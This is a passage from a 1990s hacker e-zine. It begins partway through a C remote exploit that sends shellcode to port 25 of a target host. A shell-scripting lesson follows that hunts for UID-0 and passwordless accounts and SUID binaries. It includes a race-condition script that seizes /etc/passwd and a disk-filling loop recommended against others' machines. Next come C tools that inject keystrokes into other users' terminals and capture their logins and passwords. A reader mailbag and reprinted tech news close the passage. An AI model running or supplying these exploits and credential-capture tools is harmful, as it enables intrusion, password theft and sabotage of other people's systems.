char *clear;
char buf[8192];
struct sockaddr_in sin;
struct hostent *hp;
if(argc<2)
{
/* Carparts original error message was a bit cryptic */

printf("
Usage: %s site.to.exploit\n", argv[0]);
exit(-1);
}
ptr = buf;
for(i=0;i<=4096;i++) buf[i] = NOP;
ptr += i;
memcpy(ptr,shellcode,sizeof(shellcode));
ptr += sizeof(shellcode);
clear = commands;
memcpy(ptr,clear,sizeof(commands));
ptr += sizeof(commands);
memcpy(ptr,"
3824",4);
system(clear);
printf("
Connecting To %s\n",argv[1]);
hp = gethostbyname(argv[1]);
if(hp==NULL)
{
printf("
Unknown Host\n");
exit(-1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
send(sock,buf,sizeof(buf),0);
close(sock);
printf("
Exploit Successfully Executed\n");
return(0);
}


[Scripting in UNIX....................................................Nartrof]



There are two basic skills that are necessary for every UNIX hacker
to learn. They are C programming and UNIX shell scripting. A UNIX
shell script is merely a file that contains a series of UNIX shell
commands. However through the use of various control structure a
shell script can become a very powerful tool.

The first line in any shell script should declare which shell the
script is to be executed in. For example:

#!/bin/sh

The Bash shell is the shell that is normally used for scripting.
Once upon a time there were bugs in the C shell that led many people
to become wary of and dislike it. The bugs have been fixed years
past but the dislike and the wariness remain.

After the shell has been declared, comments should be used to explain
the purpose of the script. Comment are preceded with a pound sign.
This is not to be confused with the execution shell which is declared
with a pound sign and exclamation mark. For example:

--------------------------- cut here ---------------------------

#!/bin/sh
# This line declares what this script does.
# However this script doesn't do anything yet.

--------------------------- cut here ---------------------------



After the scripts purpose has been stated, command execution begins.
The next script makes use of the grep utility. grep is one of my
favorite UNIX utilities which can be used for various different
searching purposes. I often use it to search for certain types of
files and user accounts. The next script uses the grep utility to
find accounts with a user or group ID of 0:

--------------------------- cut here ---------------------------

#!/bin/sh
# This script finds UID and GID 0 accounts.

grep ':00*:' /etc/passwd

--------------------------- cut here ---------------------------

To execute the script you will have to make it executable. You can
do this by using the following command at the shell prompt:

chmod 755 scriptname

The script is executed by typing it's name and path at the shell
prompt. If we also wanted to find unpassworded accounts we could
also include the following command line in the script:

grep '^[^:]*::' /etc/passwd

The next script will perform search for both UID 0 and unpassworded
accounts and and seperate the output:

--------------------------- cut here ---------------------------

#!/bin/sh
# This script find UID & GID 0 accounts and unpassworded accounts.

# This will find GID & UID 0 accounts
echo "
The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd
echo ""

# This will find unpassworded accounts.
echo "
The following accounts have no password."
echo ""
grep '^[^:]*::'

--------------------------- cut here ---------------------------

Notice that in the previous script I used comments to explain what
each part of the script does. This is a very important part of
scripting and programming. Comments allow others to understand what
you write and to help you to remember what each part does. This is
especially important as your scripts and programs become longer and
more complicated.

In the example of the previous script it may be desireable to have
the script not print out the root account as UID 0. You should
already know this and you may not want to bother with it on your
screen. If so you could write the script as follows:

--------------------------- cut here ---------------------------

#!/bin/sh
# This script find UID & GID 0 accounts and unpassworded accounts.

# This will find GID & UID 0 accounts
echo "
The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd | \
awk -F: 'BEGIN {n=0}
$1!="
root" {print $0 ; n=1}
END {if (n==o) print "
No accounts were found."}'

echo ""

# This will find unpassworded accounts.
echo "
The following accounts have no password."
echo ""
grep '^[^:]*::'

--------------------------- cut here ---------------------------

The awk utility is a powerful scripting language that many UNIX gurus
use to perform a variety of functions. The snippet of awk script in
the previous example removes the root account from the grep listing
and prints out the other accounts in the listing. If no accounts
were found to be UID 0 then it tells you "
No accounts were found."

Another use for a shell script might be to search for program with
SUID privileges. SUID programs are often used to exploit for root
privileges through buffer overflows and other problems. Which files
will be exploitable on any system depends on the operating system
that is running on the computer. SUID files can be found using the
find command. For example:

find / \ ( -perm -2000 -o -perm -4000 \) -print

This command line will find both SetUserID and SetGroupID privileged
programs. If you were looking for certain files to see if they were
present with SUID privileges you could redirect finds output to grep
as in the following script.

--------------------------- cut here ---------------------------
#!/bin/bash

# This script will be used to find SUID program on a system. It will also
# redirect the output of it's search to grep. grep will search for the
# program orwell, which you know to be exploitable.

echo "
The following program is SUID and is known to be exploitable."
echo ""
find / \ ( -perm -2000 -o -perm -4000 \) -print | grep 'orwell'

--------------------------- cut here ---------------------------

While the scripts demonstrated so far are simple and don't do much
more than you could easily do by hand, the UNIX shell does support a
number of control structures. One of the most widely used control
structures is the while-do loop. The while-do loop takes the form

while [condition]
do
[command]
[command]
done

What the while-do loop does is repeat the command listed between do
and done until the condition is met. The most common way to use
this loop is to assign a value to a variable and to end the condition
when that variable reaches another, different, value. If for example,
you script increased the variable COUNT by 1 when it finished
successfully then you could use the while-do loop to execute the
commands in your script until COUNT is no longer equal to it's
initial value.

--------------------------- cut here ---------------------------

COUNT=1
# COUNT now equals 1
# The loop will now start. It will end when count is no longer equal
# to 1.
while COUNT=1
do
....
the other commands in your script
....
done

--------------------------- cut here ---------------------------

When COUNT is no longer equal to 1 the loop will stop. The while-do
and other types of loops used in UNIX are very powerful for usage as
programming tools. At one time however they were frighteningly
dangerous hacking tools.

The following script for example would cause the password file to be
owned by the user who ran the script.

--------------------------- cut here ---------------------------

#!/bin/bash

# This script would cause the the password file to be owned by you.
# This should only work on older UNIX boxes.
# This script exploited a race condition that occured when mkdir attempted to
# perform the two different function required to create a new directory.
# This script creates a directory called 'crap'. It then immediately removes
# it. The script creates a race condition that eventually causes the
# directory to be replaced by a link to /etc/passwd. /etc/passwd then
# becomes owned by you. If this still works the box is old.

while : ; do
nice -10 (mkdir crap; rm -fr crap) &
(rm -fr crap; ln /etc/passwd crap) &
done

--------------------------- cut here ---------------------------


The same type of loop was also used to crash systems by creating
kernel panic or using all of the available blocks on the hard disk.
If disk quota is not enabled the following loop will still work.
It's nasty but if you just owned some punk's box and feel like giving
him a rough time....Enjoy!

--------------------------- cut here ---------------------------


#!/bin/bash
# This script is lame but it does fit the topic of while-do loops so you make
# the call.

while : ; do
mkdir ms-sucks
cd ms-sucks
done

--------------------------- cut here ---------------------------

The previous two scripts do their dirty work through the use of
endless or non-terminating loops. Endless loops are often used by
newbies to crash systems and wreak havoc but it is very likely to
encourage a commercial system to spend more money to catch you so
watch out. You should however understand the concept of both endless
and conventional while-do loops.

There are quite a few other UNIX control structure available and I do
hope to cover them in the next issue of THTJ. For now try to
experiment with what I covered here. Invent something new and be
creative. Once you reach the point of dreaming in UNIX shell scripting
will be a powerful tool which you can use to create your own exploits.
Exploits are usually system specific otherwise I would have included a
few here. Be creative, create your own bugs and wreak havoc (on your
own system of course). Until then ta,ta.

-=*Nartrof*=-

/* Greetz go out to BlakAngel, TdLord, Iceburg, WyseGuy,
Dovee, Kara, Oxygen, T1, ac|ds, Astra, Oxygen, Coredata,
Warpy,Pentium, Pan51, Nalius, Confinest and Ct2 */

[ttyread.c and ttywrite.c...............................................simon]

/* ttywrite.c - by simon <simon@yahoo.com> part of my tty suite
*
* This program bypasses the normal superuser check for stuffing chars
* into other people's terminals. All you need is write permission on
* the user's terminal.
*/

#include <sgtty.h>
#include <stdio.h>

main(argc, argv)
char **argv;
{
register int fd; /* file descriptor */
char ch; /* current character */
char name[100]; /* tty name */
struct sgttyb sb; /* old and new tty flags */
struct sgttyb nsb;

if (argc < 2)
{
fprintf(stderr, "
ttywrite ttyname\n");
exit(1);
}
argv++;
if (**argv == '/')
strcpy(name, *argv); /* build full name */
else
sprintf(name, "
/dev/%s", *argv);

if (setpgrp(0, 0)) /* clear my process group */
{
perror("
spgrp");
goto done;
}

if (open(name, 1) < 0) /* open tty, making it mine */
{
perror(name);
exit(1);
}

fd = open("
/dev/tty", 2); /* open read/write as tty */

if (fd < 0)
{
perror("
/dev/tty");
exit(1);
}

ioctl(0, TIOCGETP, &sb); /* go to raw mode */
nsb = sb;
nsb.sg_flags |= RAW;
nsb.sg_flags &= ~ECHO;
ioctl(0, TIOCSETN, &nsb);
sigsetmask(-1); /* stop hangups */
printf("
Connected. Type ^B to exit\r\n");
while (1)
{
if (read(0, &ch, 1) <= 0) break;
if ((ch & 0x7f) == '\002') break;
if (ioctl(fd, TIOCSTI, &ch)) /* stuff char on "
his" tty */
{
perror("
\r\nsti failed\r");
goto done;
}
ch &= 0x7f; /* echo it for me */
if (ch < ' ')
{
if ((ch == '\r') || (ch == '\n'))
{
write(1, "
\r\n", 2);
continue;
}
ch += '@';
write(1, "
^", 1);
write(1, &ch, 1);
continue;
}
if (ch == '\177') {
write(1, "
^?", 2);
continue;
}
write(1, &ch, 1);
}

done: ioctl(0, TIOCSETN, &sb); /* reset tty */
}

------------------------------------------------------------------------------

/* ttyread.c - by simon <simon@yahoo.com> part of my tty suite
*
* This will read stuff off of other user's tty.
*/

#include <stdio.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/termios.h>

#define DEBUG 1 /* Enable additional debugging info (needed!) */
#define USLEEP /* Define this if your UNIX supports usleep() */

#ifdef ULTRIX
#define TCGETS TCGETP /* Get termios structure */
#define TCSETS TCSANOW /* Set termios structure */
#endif


handler(signal)
int signal; /* signalnumber */
{ /* do nothing, ignore the signal */
if(DEBUG) printf("
Ignoring signal %d\n",signal);
}

int readandpush(f,string)
FILE *f;
char *string;
{
char *cp,*result;
int e;
struct termios termios;

result=fgets(string,20,f); /* Read a line into string */
if (result==NULL)
{ perror("
fgets()");
return(1);
}
if (DEBUG)
{ printf("
String: %s\n",string);
fflush(stdout);
}

ioctl(0,TCGETS,&termios); /* These 3 lines turn off input echo */
/*

  
echo = (termios.c_lflag & ECHO); */
termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
ioctl(0,TCSETS,&termios);

for (cp=string;*cp;cp++) /* Push it back as input */
{ e=ioctl(0,TIOCSTI,cp);
if(e<0)
{ perror("ioctl()");
return(1);
}
}
return(0);
}

main(argc,argv)
int argc;
char *argv[];
{
/* variables */
int err;
FILE *f;
char *term = "12345678901234567890";
char *login = "12345678901234567890";
char *password = "12345678901234567890";
if (argc < 2)
{ printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
printf("Enter ttyname: ");
gets(term);
}
else term=argv[argc-1];

signal(SIGQUIT,handler);
signal(SIGINT,handler);
signal(SIGTERM,handler);
signal(SIGHUP,handler);
signal(SIGTTOU,handler);

close(0); /* close stdin */
#ifdef ULTRIX
if(setpgrp(0,100)==-1)
perror("setpgrp:"); /* Hopefully this works */
#else
if(setsid()==-1)
perror("setsid:"); /* Disconnect from our controlling TTY and
start a new session as sessionleader */

#endif
f=fopen(term,"r"); /* Open tty as a stream, this guarantees
getting file descriptor 0 */

if (f==NULL)
{ printf("Error opening %s with fopen()\n",term);
exit(2);
}
if (DEBUG) system("ps -xu>>/dev/null &");
fclose(f); /* Close the TTY again */
f=fopen("/dev/tty","r"); /* We can now use /dev/tty instead */
if (f==NULL)
{ printf("Error opening /dev/tty with fopen()\n",term);
exit(2);
}

if(readandpush(f,login)==0)
{
#ifdef USLEEP
usleep(20000); /* This gives login(1) a chance to read the
string, or the second call would read the
input that the first call pushed back ! /*
#else
for(i=0;i<1000;i++)
err=err+(i*i)
/* error /* Alternatives not yet implemented */

#endif
readandpush(f,password);
printf("Result: First: %s Second: %s\n",login,password);
}

fflush(stdout);
sleep(30); /* Waste some time, to prevent that we send a SIGHUP
to login(1), which would kill the user. Instead,
wait a while. We then send SIGHUP to the shell of
the user, which will ignore it. */

fclose(f);
}




[The Mailroom...........................................................scud_]

*NOTE*: From now on, all e-mail addresses, and message headers will
be ripped out of the e-mail before being released into the Mailroom!
Now you can feel free to e-mail us and not have millions of flame
mails waiting for you the next time you open you e-mail!

---

Whatz up. Have a nice day

[The Sky.]

While others may argue about whether the world ends
with a bang or a whimper, I just want to make sure
mine doesn't end with a whine.

Help! i am za beginner hacker and i need help on how to hack.. i need
detailed info on how to hack or some addresses might help me a lot.
Please can youi help me i only hacked into something once by acciddent!
--Barbara Gordon

[ Well, until Havoc Bell Systems releases releases their guide to hacking,
look at hackkit by i-e. You can find it on rootshell.com, or possibly at
thtj.com ]

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com

[No, no I don't.]


---

I want a scanner.

[ I want a BMW M3. ]


---

I am kinda new into the world of hacking
My local library has a BBS and i have 250 dollars worth of outstamding
fines how can i hack the system?I was also wanodering if I could be part or
your web page or something

e-mail me back

[ 1. How the fuck did you manage to get $250 worth of fines?

2. Well, you need to be a *little* more specific on what type of BBS this
library runs.

3. THTJ doesn't bother with BBSes anymore, most people have moved to the
Internet.

4. Part of my web page? What do you mean? ]

---

was hackers here, seem's there is nothing afet the big "Freez..", well gotta
run, shurE miss the old one.......

[ SNeitz, what the fuck is this 'Freez' you keep speaking of? ]

---

Jus wanted to tell u guys that u r the greatest.
the best zine i have ever read.None of that newbie guide shit.Just clear
concise info. Luv it man.
Don ever stop .

[ We aim to please. ]

---


Hello
I was wondering if u can answer a question for me. Wel I heard that its
possible to enter someone hard drive through telnet, i would like to
know if this is true and if it is how would I go about doing it. Or are
there other programs that can do it besides telnet.
Thanks,
LogX
albender@geocities.com

[ Anything is possible. It all depends on several variables, which I will
leave for you to find out. ]

---



my x gf is pissing me off. is there any way i can hack into her comp through
my tcp/ip connection. if there is please send me instructions on how to.


thanx

** *******

[ If there is a will, there is a way. Find out that way yourself. ]

---

In thtj16, [which i very much enjoyed] i noticed your article about
NetBIOS attacks and such.. Well i found that each time i tried it said

NBT DRIVER 1 NOT FOUND

So inturn screwing up readers. Well, you really should put in thtj 18 or
something that you have to ENABLE NetBIOS in TCP/IP networking settings.

Just to let ya know

Ld

[ Thanks for passing along the info. ]

---

Why aren't you takeing any members

[ Because we dont want AOLers such as yourself bugging us about joining.
So, we closed our doors, and you have ruined it for everyone else. ]
---

hi i want to learn how to hack. I've spent hours searching the net, and all
i am getting is bits and pieces of how to hack a Unix. I am learn dick all
can you email me and tell me step by step what i need to do to start
hacking. i would be most gratful, if you can't can you atleast email me at
pparker@cyberlink.bc.ca and refer em to a really good site that will teach
me everthing i need to know. i really want to learn to hack. maybe you
could email me once a week with lessons on how to hack, starting at the
beginning. anyway thank you for reading this but could you plese email me
back.
thanks :-)

[ Lessons? Hacking 101 is a self taught class. Go find hack_kit2.0 and
read it for an intro to hacking. ]

---
Hey Scud,

I like your zine. Just wanted to make a comment that I think that maybe
should should write the journal in HTML format. It would add allot to the
zine, I'm sure u know, of the advantags. Thanxs, keep it up.

BTW, PGP public key?

nakar

[ After issue 6 it was too much work to convert 150+ k of text to
HTML, so we stopped making thtj in HTML. If one of you out there
wants to do it, by all means go ahead and let us know. ]
---



Dear Scud-0 , I would like to say your mag rocks!!!
also do you know how to cause a little havoc at certain stores?
if you know the following just pass the info along :
at certain chain stores(or stores with computer on display like Wal mart,
K mart,ect) you can get passed the password on the screen saver by pressing
Ctrl+Alt+Delete and tell it to end the screen saver or you can sometimes
press Alt+Tab to goto the next open window till my next letter happy hacking

Whisper Death
@-}--------
---

I need programs but everything is a zip file where can I find exe files to
use?
Or how can I change my computer to use zip files?
just asking for help, thanks

SAINT
[ You want to be a hacker and you cant figure out how to use zip files? ROFLOL
(ten minutes of laughing) Look up winzip or pkzip on the world wide web. ]

---
Subject: NBC News 12/14/97

Was it me or was that guy in the report on "cyber crime" "hacking" with
Microsoft Word?

[ I dont know, I missed the show, but most likely it was Word, if NBC ran it.]

---
Hello,

I'm looking for a "punter". I understand that they are typically
against aol TOS regulations, but in a room that was being torn apart by
fools, an AOL guide was asked about them. She said she could support their use
in only the most unbearable circumstances. That certainly can happen.
Can anyone tell be how to aquire one...or a direction to begin?
Appreciate any help.
Josh.

[ Nope, I cant tell you, I dont use AOL.]

---


hey what's going on in cyber space there is nothing to do tonight . so I'm
on the net with my friends to see what we can get into .,
got any pointers to give to a new hacker wanna be if so email me back all
the info will be very useful in my boring life
laters
mogul

[ Yea, the inet is pretty boring. Make it more lively by getting hack-kit2.0
from rootshell.com and try out some of the code and methods they use, it
should hopefully make things more fun for you. ]

---


I'm looking to find new friends in the columbus, cincinnatti,ohio area.Thank
you in advance for your reply.
Yogi4069

[ what the fuck? since when did thtj become a dating service? Ok, Yogi was
only asking for friends, but thtj is not a friends network, it is a zine.
oh well, consider it done. ]

---

I would like to learn how to become a very good hacker.. I've looked
all over, and went to hacker dot com. That is where I came across your
link, I would like to become as good as you guys. If you are willing to
teach me bit by bit, please email me back.

[ Go get hack-kit2.0 like i told everyone else to. ]


---


If you know any hackers/phreaks from the 813 area code please have
them contact me at:

axessphreak@most-wanted.com

[ consider it done. ]
---


I AM ON MY SISTERS SCREEN NAME .BECAUSE MY DAD HAS ME LOCKED OUT . I HUMBLY
ASK FOR SOME HELP IN THIS LOCK OUT MATTER. ANY SUGGESTIONS PLEASE REPLY TO
SAAFIR21@AOL.COM

[ NEXT TIME DONT WRITE IN ALL CAPS!! ]

---


Hey! I've heard from friends that you wanted to know what HAVOC: THE
PROGRAM is. Well, I needed alot of encouragement, but I am now willing
to say that I AM THE WRITER OF HAVOC: THE PROGRAM. If you want to find
out more about it, e-mail me at Xabbu@hotmail.com.

By the way, I love your zine!

!Xabbu

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

[ woo hoo. Im overjoyed. Next time just send me the facts. I can barely
contain my excitement. ]

---


hello.....
my nick is sandspidr
i am relativley new to the hacking
scene but am learning rapidly.
but anyways, here is something i thought would interest u.
the other day while i was shopping at Giant Eagle, i noticed
this lame ass waste of space machine called coinstar. i was
looking at it (trying to find a way to steal money) when i notice
a fone line running into the machine. i came back later in the day
with a phone and ani'ed the number. so i went home and dialed in
with my modem. the system is QNX systems. i havent done a thourough
investigation on the system. i am looking for a service number to see
if i can find an idiot to give me the login and password.
more later.....if u want
sandspider
bbrains@hotmail.com

[ Sounds cool, keep us informed. ]

---


I found that article 9 is very very true. We are being monopolize and
manipulated. Though I'm not a hacker but just a simple person who had no
choice to comply to large corporate manufactured software. Shit I hate
this.

[ Down with Big Brother! ]



[The News...........................................................KungFuFox]

1 : Suggestion to Bill Gates for a Microsoft Christmas
2 : Twice Removed: Locked Up and Barred from Net
3 : Pretty Good Privacy Not Looking So Great
4 : Sixth Coming
5 : Hackers break into Yahoo!, call for release of Mitnick
_____________________________________________________________

Suggestion to Bill Gates for a Microsoft Christmas
by Jon Katz

25.Nov.97 -- Dear Mr. Gates,

Christmas comes but once a year, and it's never too early to start tackling
that holiday shopping list. Yours could be a whopper.

I know you're buying some neat stuff for yourself: that gazillion-dollar
Tommorrowland near Redmond, Michelangelo's old notebooks, Napoleonic
bric-a-brac, and a US$21 million jet you just paid for out of your pocket,
you lean and mean little corporate devil.

But you do have $40 billion in the bank, and before you order that futuristic
new yacht, please take a few seconds to consider an idea I had in the middle
of the night. This idea would do you worlds of good. It would establish
Microsoft world domination once and for all, and justifiably so. The
beleaguered folks at Netscape would run up the white flag.

Those pesky bureaucrats at the Justice Department would soon be scurrying for
cover, and you'd spark yet another - the biggest ever - wave of
Gates-is-amazing hype in the media.

This could be big. It would demonstrate that you are, in fact, a true
visionary, and show the amazing power of new kinds of companies like yours to
shape the world for the better.

Listen, I know you're not exactly up nights worrying about people like me -
gnats on the elephant's butt - but this would also have the added effect of
shutting me and my ilk up for good. In some quarters, like my house, that
would be seen as no small miracle.

Here's the idea: Wire each and every classroom in America. Various estimates,
from private companies to the Commerce Department, have put the price tag of
wiring up all the United States' schools properly at anywhere between $5
billion and $9 billion, depending on how lavishly and comprehensively it's
done. The usual model is five computers to a classroom, plus the software,
staff, phone lines, maintenance, security, and space to use them properly.

The shocking thing about the low and high ends of these estimates is that you
could write a check for either amount and still install those
climate-controlling computer chips in every room of your new house. This
could cost you as little as 10 percent of your worth or, at the most, 20
percent.

And think about it: Overnight, you could wipe out the gap between the
technology haves and have-nots. You could virtually guarantee employment
opportunities to a whole generation of kids being left behind, while
journalists and politicians obsess about porn on the Net.

You would earn a knock-out place in history. You would show that the right
company, managed in the right way with the right heart and vision, can be
more effective in the digital age than the president of the United States and
the vast bureaucracy he ostensibly leads. And do much more good in a short
time than the US Congress does in any given generation.

While these people flap their gums about morality on the Internet, and warn
about online perverts and militias, you could, all by yourself, address and
eradicate in a couple of years the real moral issue facing Americans and new
technology - making sure everybody has equal access to it.

In the urban underclass, for example, federal statistics show that only a
tiny fraction of people own computers or have online access. The number isn't
rising, either. These people are being condemned and sentenced to cultural
and educational deprivation and economic disadvantage.

For all Mr. Clinton and Mr. Gore's technoblather about that bridge to the
21st century, Congress and the administration are much too busy posturing,
scheming, fundraising, and devouring one another to do anything meaningful
about getting many of us there.

You could give Americans one of their greatest Christmas presents ever. You
could put computers in every classroom. For that matter, if you wanted to dig
a little deeper, you could make sure every American kid who wants one has
one.

You wouldn't even have to write one single check or lower your balance in one
shot. A couple billion dollars a year for four or five years would do the
trick. For that matter, you could set up some sort of fund and donate
computers off the interest alone. Other corporations would perhaps compete
with you to do similar acts of good, all in the interest of image-burning and
market share. Talk about vision and leadership!

This would be a hummer of a Christmas gift. It would sure convince me you
were a new kind of corporate leader and a hell of a nice guy to boot, as so
many journalists have been writing.

And nobody much would even dare to argue Microsoft was too powerful for the
nation's good. And, as I fiddle with my PowerBook's calculator, it would
still leave you with about $30 billion, at least. This could be a modern
Christmas Carol.

Thanks for listening. I'm sure I'll be hearing from you, one way or the
other. And happy holidays.

(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________

Twice Removed: Locked Up and Barred from Net
by Steve Silberman

3.Dec.97 -- When US District Court Judge Sam Sparks sent Chris Lamprecht to
the Federal Correctional Institution in Bastrop, Texas, in 1995, the
24-year-old hacker sobbed before the bench. A stint in the federal pen was
terrifying enough, but the judge had tacked an unusual condition onto his
70-month sentence. Though Lamprecht was being sent to Bastrop for money
laundering - not the hacking that earned him the handle "Minor Threat" -
Judge Sparks stipulated that Lamprecht was forbidden to access the Internet
until 2003.

"I told the judge computers were my life," Lamprecht recalled.

Any case that involves computers and a boyish, fair-skinned defendant is
bound to get press, but things have changed since Swing magazine billed
Lamprecht as "the first person to be officially exiled from cyberspace." If
the young hacker was the first to be exiled from the online world by law, he
now has plenty of company, following the circulation of an internal memo at
the Federal Bureau of Prisons last year, which set in stone a federal policy
of keeping prisoners - and even many parolees - offline.

According to the federal view, logging on is simply incompatible with
incarceration. As chief bureau spokesman Todd Craig states, in bureaucratese,
"Access to the Internet is not a necessary tool for the correctional process"
- which means that with more than 1.6 million people locked up in the United
States alone, and thousands of parolees subject to similar restrictions even
as they attempt to rejoin modern life, a significant population is being left
behind by the network revolution.

What's at stake? As more and more jobs are wired into the Net and the Web,
the possibility that former offenders will be able to find employment after
incarceration becomes more and more remote - which undermines the very
bedrock of the correctional process, asserts Jenni Gainsborough, spokeswoman
for the American Civil Liberties Union's National Prison Project.

"The aim of our prisons should be to release people who are able to
reintegrate themselves into society,"
she explains. "But no politician wants
to appear soft on crime. Nobody thinks about what's actually useful to reduce
the recidivism rate."


A poster boy for keeping prisons unwired

Mention the words prisoner and Internet in a sentence, and the same
object-lesson will come up over and over again: the case of George
Chamberlain, a sex offender incarcerated at Lino Lakes state prison in
Minnesota, who used his position as manager of computer services for a
venture called Insight Inc. to download child pornography from the Net while
sitting in jail.

Chamberlain was a poster boy for keeping prisoners as far away from a modem
as possible. He not only siphoned 287 erotic images off the Net and encrypted
them on an optical drive behind the pass phrase "They cannot commit me," he
also compiled lists of thousands of children's' names, and chitchatted with
other pornographers through an anonymous remailer.

"The idea that a prisoner had this kind of access to the Internet and was
able to collect explicit child pornography and communicate with others on how
to hide it,"
US Attorney David Lillehaug declared last March, "is almost
unbelievable."


The Chamberlain case seemed all too believable, however, given a statement
issued by the US Parole Commission just three months earlier. The commission,
"responding to increased criminal use of the Internet," approved
"discretionary use of special conditions of parole that would impose tight
restrictions on the use of computers by certain high-risk parolees."


A spokesperson for the Parole Commission declined to answer questions about
the number of parolees currently subject to restrictions on computer use,
which include a ban on encryption, screening of online activity by monitoring
or blocking software, compulsory daily logging of all Web sites visited, and
unannounced searches of drives and disks by parole officers.

Federal Bureau of Prisons spokesman Craig equates the ban on computer use by
inmates to restrictions on use of the telephone. "They can make 15-minute
calls to pre-approved numbers, like family and clergy,"
Craig says. It would
be impossible, he says, to pre-approve forays into the online world in the
same way.

In its press release, the commission said it acted "after noting the surge of
'how-to' information available on the Internet and other computer online
services relating to such offenses as child molestation, hate crimes, and the
illegal use of explosives."


"That's complete BS," charges Stanton McCandlish, program director for the
Electronic Frontier Foundation. "There was no alarming increase in that kind
of 'how-to' information on the Net. There was an increase in publicity about
politicians like Dianne Feinstein, who used those fears as justification to
limit use of the Internet."


McCandlish points out that last June's Reno v. ACLU decision by the Supreme
Court sent a message that the court considers the Net as much subject to
First Amendment speech protections as the printed word. Comparing broad
prohibitions on the use of computers by prisoners and parolees to banning the
act of writing by those in prison, McCandlish predicts that "the issue is
going to heat up"
in the coming year. The EFF is "waiting for a good, solid
legal challenge"
to arise before getting involved in a case, McCandlish says.

The world's best-kept secrets

A small California businessman named John Danes runs an outfit called
Inmate.com, charging prisoners US$70 to design and maintain a personal
homepage and an email address for three months. Each week, Danes prints out
the incoming mail, peruses it for forbidden content like pornography or
communication from minors, and forwards it to the inmates via snail mail. At
present, nearly 70 male prisoners and three women have homepages at
Inmate.com. The majority of the inmates are black or Hispanic; several of the
pages maintain the author's innocence; many are an invitation to romance.

Ironically, the ACLU's Gainsborough attributes some of the public's fear
about convicted criminals having a gateway to the Net to the publicity given
to Web sites like Inmate.com and Dead Man Talkin' - sites that are put up by
friends of prisoners who do not themselves have access.

"Serial-killer homepages and prisoner sites contribute to the public
perception that there's a huge use of the Net by these people to advertise
their evil ideas,"
Gainsborough says, while affirming her support for the
right of prisoners to express themselves.

One page on the Inmate.com site asks, "Have you ever wondered what it's like
to live in another world right here on Earth? What would you do if you
suddenly fell from grace? Prisons hold some of the world's best-kept
secrets."
Secrets are one thing, Gainsborough observes, that prisoners are
not allowed to keep.

"In many prisons, even [typewriters with built-in memory] are forbidden," she
says. "There's always this fear of prisoners hiding this stuff away - so the
idea of computers where people could really keep stuff hidden is very
frightening."


In July 1996, a promising computer-training program at the Washington State
Reformatory was terminated when it appeared that the prisoners were learning
too much about computers - that is, more than prison officials knew.

Mike Williams, associate superintendent at the reformatory, was head of
security for the program, which was a pilot for a statewide effort that would
have allowed prisoners to learn how to use business software like Microsoft
Excel, PowerPoint, and Word.

"The inmates learned a lot of good stuff," Williams acknowledges. "They were
able to learn a trade while in prison, so that they might have been actually
able to get a job in that area when they got out. This was like real-world
vocational training."


So why was the innovative program scrapped, rather than ported to every
jailhouse in the state?

"Our superintendent thought it was a manageable pilot program," Williams
recalls, "but the key figures who needed to approve it up in Olympia decided
to put an end to it. We had inmates learning more about computers than we had
staff time to keep an eye on them. We couldn't keep up with them."


The fear that prisoners would use encryption or other electronic means to
cloak escape plans was a chief concern. "It was a cat-and-mouse game. We had
to load the software for them, and there was no money allocated to hire more
officers to do that kind of thing,"
Williams says. Though at least one inmate
claims that graduates of the program had landed good jobs upon release, state
deputy director of prisons Jim Blodgett - one of the "key figures" in the
state capital who decided to shut the gate on the pilot effort - told a
reporter, "We couldn't see the value in keeping it. We had staff not knowing
what was going on."


If the object of incarceration is to ensure that prisoners remain at least as
ignorant of current technologies as untrained prison staff, the federal
policy will be deemed a success. But as the Net touches every area of our
experience - from our most intimate relationships to our responsibilities as
participants in a democratic society - more and more of those on the outside
of the bars are coming to feel, with Lamprecht, that "computers are our
lives,"
or are inextricably linked with our lives.

And those on the inside are destined to be released into a life for which
they are even more unprepared than former offenders were in the past.

(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________

Pretty Good Privacy Not Looking So Great
by James Glave

3.Dec.97 -- Legendary cypherpunk and former PGP Inc. chief technology
officer Phil Zimmermann is in the uncomfortable position of having to eat
his words.

Following Monday's US$35 million cash acquisition of PGP by Network
Associates, the man who once testified before the Senate that key recovery
could "strengthen the hand of a police state" now works for a company that
actively promotes it.

Reaction from e-privacy activists was swift and harsh.

"The users of PGP can no longer rely on the credibility of Phil Zimmermann to
ensure that the product is everything that they've been promised it's been
previously,"
said Dave Banisar, attorney for the Electronic Privacy
Information Center and co-author of The Electronic Privacy Papers

Network Associates, formerly known as McAfee Associates, is an active member
of the Key Recovery Alliance, an organization that lobbies Congress for key
recovery that would grant law enforcement agencies back-door access to
private encrypted communications.

Network Associates and other companies support key recovery because it would
allow them to export strong crypto software without bothering to make a
separate nonrecoverable version for the domestic market. The Commerce
Department forbids export of the strongest available encryption without
elaborate promises from manufacturers to develop key recovery features. Thus
many companies are forced to develop both export and domestic versions of
their software, each with differing crypto strengths.

But Zimmermann, a pioneer of strong encryption, has spent years crusading
against key recovery, calling it an invasion of privacy. And the most recent
release of PGP's encryption software allows users to disable key recovery.

"People should give their consent to use [recovery]," Zimmermann said. When
asked whether future versions of the package will retain that option,
Zimmermann replied, "Certainly, as long as I have anything to say about it."

Zimmermann's new title at Network Associates is "fellow," but he declined to
comment on exactly what authority and responsibility that confers. Meanwhile,
Phil Dunkelberger, PGP's former president and CEO, was named general manager
of Network Associates' Total Network Security Division.

"It's going to take some time to figure things out," said Zimmermann.

EPIC's Banisar was less diplomatic and postulated that Zimmermann's new title
reflected a clash of values between him and Network Associates on key
recovery.

"We have a number of fellows here, and they are usually unpaid volunteers,"
Banisar said.

"It will require a fundamental examination by human rights groups and others
about whether any newer versions of PGP are truly trustworthy,"
said Banisar.

Network Associates could not be reached for comment.

